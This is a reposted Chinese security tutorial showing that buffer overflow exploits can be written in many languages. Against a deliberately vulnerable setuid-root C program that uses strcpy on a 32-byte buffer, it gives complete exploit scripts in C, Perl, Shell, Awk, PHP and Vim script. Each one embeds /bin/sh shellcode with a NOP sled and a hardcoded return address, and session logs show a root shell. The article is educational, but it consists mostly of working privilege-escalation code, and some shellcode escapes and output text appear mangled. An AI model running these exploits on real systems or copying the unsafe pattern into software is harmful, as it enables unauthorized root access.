溢出利用程序和编程语言大杂烩

技术2022-05-11 63

作者：watercloud <watercloud _at_ nsfocus.com> 出处：http://www.nsfocus.net 日期：2005-04-04 溢出利用程序不仅仅是只能用c语言编写，其实几乎任何编程语言都能用来编写溢出利用程序，这里用Linux作为试验平台，以实例演示C、Perl、Shell、Awk 语言编写溢出利用程序。之所以选择这几个语言是因为他们都几乎是Unix系统自带的语言（商用Unix系统中C语言例外）。示例中基本都是把SHELLCODE放到环境变量中来实现精确定位的。 <一> 有溢出漏洞的vul.c [cloud@test]$ id uid=505(cloud) gid=503(test) groups=503(test) [cloud@test]$ cat vul.c /* Demo Have a bof vul at argv[1]. Write by watercloud @ xfocus.org */ #include<stdio.h> int main(int argc,char * argv[]) { char buff[32]; if(argc > 1) { strcpy(buff,argv[1]); } printf("buff : %s/n",buff); return 0; } [cloud@test]$ gcc vul.c -o vul [cloud@test]$ ls -l vul -rwxr-xr-x 1 cloud test 11627 2月 24 10:14 vul [cloud@test]$ sudo chown root vul [cloud@test]$ sudo chmod u+s vul [cloud@test]$ ls -lh vul -rwsr-xr-x 1 root test 11K 2月 24 10:14 vul <二> C语言版本利用程序ex.c [cloud@test]$ cat ex.c /* Demo for exploit bof of "./vul" Write by watercloud @ xfocus.org */ #include <stdio.h> #define TARGET "./vul" #define ADDR 0xbffff3e8 char SH[]="1/xc0PPP[YZ4/xd0/xcd/x80" "j/x0bX/x99Rhn/shh//biT[RSTY/xcd/x80"; int main(int argc,char * argv[]) { char env_buff[4000]; char cmd_buff[1024]; int i,ret; unsigned int *pi; char * pc; for(i=0;i<3096;env_buff[i++]=0x90){ }; env_buff[i]='/0'; strcat(env_buff,SH); setenv("KK",env_buff,1); strcpy(cmd_buff,TARGET); pc=&cmd_buff[strlen(TARGET)]; *pc++=' '; for(ret=1,i=0;i<4 && ret;i++) { int j; *pc++='A'; pi=(unsigned int *)pc; for(j=0;j<20;*pi++=ADDR,j++){}; *pi=0; ret=system(cmd_buff); } return ret; } [cloud@test]$ gcc ex.c -o ex [cloud@test]$ ./ex buff : A梵�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?? 梵�胯?? buff : AA梵�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯? 胯?胯?? buff : AAA梵�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯? �胯?胯?? buff : AAAA梵�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯 ?胯?胯?? sh-2.05b# id uid=0(root) gid=503(test) groups=503(test) sh-2.05b# exit exit <三> perl语言版本利用程序ex.pl [cloud@test]$ cat ex.pl #!/usr/bin/perl # Demo for exploit bof of "./vul" # Write by watercloud @ xfocus.org #$ENV_LEN=`env |wc -c` $SHELL="1/xc0PPP[YZ4/xd0/xcd/x80j/x0bX/x99Rhn/shh//biT[RSTY/xcd/x80"; $ENV{KK}= "/x90"x 3096 . $SHELL; for($ret=1,$ag="AA",$i=0;$i<4 && $ret; $ag="A"x $i++) { $ret=system "./vul",$ag. "/xff/xbf/xe8/xf3"x20; #ADDR:0xbffff3e8 } #EOF [cloud@test]$ perl ex.pl buff : AA�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯 ?胯?胯? sh-2.05b# id uid=0(root) gid=503(test) groups=503(test) sh-2.05b# exit exit <四> Shell语言版本利用程序ex.sh [cloud@test]$ cat ex.sh #/bin/bash # Demo for exploit bof of "./vul" # Write by watercloud @ xfocus.org #ENV_LEN=`env |wc -c|tr -d ' '` SH="1/xc0PPP[YZ4/xd0/xcd/x80j/x0bX/x99Rhn/shh//biT[RSTY/xcd/x80"; AG="AA";for (( i=0;i<10;i++));do AG=$AG$AG;done ;AG=$AG$AG$AG #3096 for((i=0;i<20;i++));do AD=$AD"/xff/xbf/xe8/xf3";done #ADDR:0xbffff3e8 export AGSHELL=$AG`echo -e $SH` for((i=0;i<4;i++)) ;do AA=$AA"A" if ./vul $AA`echo -e $AD` then break fi done #EOF [cloud@test]$ chmod a+x ex.sh [cloud@test]$ ./ex.sh buff : A�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯? �胯?胯? ./ex.sh: line 16: 5287 段错误 ./vul $AA`echo -e $AD` buff : AA�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯 ?胯?胯? sh-2.05b# id uid=0(root) gid=503(test) groups=503(test) sh-2.05b# exit exit <五> awk语言版本利用程序ex.awk [cloud@test]$ cat ex.awk # Demo for exploit bof of "./vul" # Write by watercloud @ xfocus.org BEGIN{ SH="1/xc0PPP[YZ4/xd0/xcd/x80j/x0bX/x99Rhn/shh//biT[RSTY/xcd/x80"; AG="AA"; for ( i=0;i<10;i++) { AG=AG""AG; } AG=AG""AG""AG #3096 for(i=0;i<20;i++) { AD=AD"/xe8/xf3/xff/xbf"; #ADDR:0xbffff3e8 } AA="AA" for(i=0;i<4;i++) { AA=AA"A" system("./vul "AA""AD" "AG""SH) } } #EOF [cloud@test]$ gawk -f ex.awk /dev/null buff : AAA梵�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?? buff : AAAA梵�胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?胯?? sh-2.05b# id uid=0(root) gid=503(test) groups=503(test) sh-2.05b# <六> PHP版本 [cloud@MagicLinux tmp]$ id uid=502(cloud) gid=502(cloud) groups=502(cloud) [cloud@MagicLinux tmp]$ ls -l vul -rwsr-xr-x 1 root root 4895 2月 26 20:57 vul [cloud@MagicLinux tmp]$ cat ex.php <?php $SH="1/xc0PPP[YZ4/xd0/xcd/x80j/x0bX/x99Rhn/shh//biT[RSTY/xcd/x80"; $AG="AA"; for( $i=0;$i<10;$i++){ $AG.=$AG; } $AG.=$AG.$AG; #3096 for($i=0;$i<20;$i++) { $AD.="/xff/xbf/xe8/xf3";#ADDR:0xbffff3e8 } for($i=0;$i<4;$i++) { $AA.="A"; print system("./vul ".$AA.$AD.$AG.$SH); } ?> [cloud@MagicLinux tmp]$ php ex.php 1>/dev/null id >&2 uid=0(root) gid=502(cloud) groups=502(cloud) exit [cloud@MagicLinux tmp]$ <七> Vim扩展脚本版本连vim编辑器的扩展编程脚本也可以拿来写溢出的说： [cloud@MagicLinux tmp]$ id uid=502(cloud) gid=502(cloud) groups=502(cloud) [cloud@MagicLinux tmp]$ cat ex.vim let SH="1/xc0PPP[YZ4/xd0/xcd/x80j/x0bX/x99Rhn/shh//biT[RSTY/xcd/x80" let AG="AA" let i=0 while(i<10) let AG=AG.AG let i=i+1 endwhile let AG=AG.AG.AG "len of AG is 3096 let AD="" let i=0 while(i<20) let AD=AD."/xff/xbf/xe8/xf3" "ADDR:0xbffff3e8 let i=i+1 endwhile let AA="" let i=0 while(i<4) let AA=AA."A" execute "!./vul ". AA . AD . AG . SH let i=i+1 endwhile [cloud@MagicLinux tmp]$ ls -l vul -rwsr-xr-x 1 root root 4895 2月 26 20:57 vul [cloud@MagicLinux tmp]$ vim -eS ex.vim Xlib: connection to ":0.0" refused by server Xlib: No protocol specified buff : A�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯�胯驛AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA …………………………………………………………………… AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1繮PP[YZ4型�j X橰hn/shh//biT[RSTY蛝 sh-2.05b# id uid=0(root) gid=502(cloud) groups=502(cloud) sh-2.05b# <八> …… <九> 小语溢出的根本在于地址定位、堆栈等数据结构的使用约定和组织、操作系统运行时结构等了解这些知识后溢出利用本生和编程语言是没有关系的。

专利

最新回复(0)